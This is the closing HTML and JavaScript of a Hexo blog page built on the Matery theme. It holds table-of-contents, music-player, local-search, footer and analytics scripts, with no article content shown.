            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script>

    
    <div class="container row center-align" style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2024</span>
            
            <span id="year">2019</span>
            <a href="/about" target="_blank">Catalina Smith</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/blinkfox" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:1181062873@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=1181062873" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 1181062873" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

	
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
